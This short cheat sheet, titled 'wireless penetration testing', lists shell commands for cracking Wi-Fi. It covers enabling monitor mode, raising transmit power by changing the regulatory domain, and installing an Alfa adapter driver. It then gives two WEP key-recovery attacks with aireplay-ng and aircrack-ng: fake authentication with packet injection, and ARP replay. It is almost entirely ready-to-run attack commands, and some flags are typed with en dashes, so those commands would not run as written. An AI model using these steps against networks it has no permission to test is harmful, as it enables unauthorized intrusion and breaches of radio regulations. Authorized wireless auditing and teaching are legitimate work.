wpa hack
Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]
WIRELESS ANTENNA
Kill Monitor Processes
root@uceka:~# airmon-ng check kill
Open the Monitor Mode
root@uceka:~# ifconfig wlan0 down root@uceka:~# airmon-ng start wlan0 # if you get an error with airmon-ng command, try this ; # iwconfig wlan0 mode monitor # use wlan0 instead of wlan0mon root@uceka:~# ifconfig wlan0 up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0 root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto> #txpower is 30 (generally) #txpower is depends your country, please googling root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
Driver Install (Kali – Alfa Adapter)
root@uceka:~# sudo apt update root@uceka:~# sudo apt upgrade -y root@uceka:~# sudo apt dist-upgrade -y root@uceka:~# sudo reboot now root@uceka:~# sudo apt update root@uceka:~# sudo apt install realtek-rtl88xxau-dkms root@uceka:~# sudo apt install dkms root@uceka:~# git clone https://github.com/aircrack-ng/rtl8812au root@uceka:~# cd rtl8812au/ root@uceka:~# sudo make root@uceka:~# sudo make install
Scan
root@uceka:~# airodump-ng wlan0mon # or root@uceka:~# wifite
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>
uceka 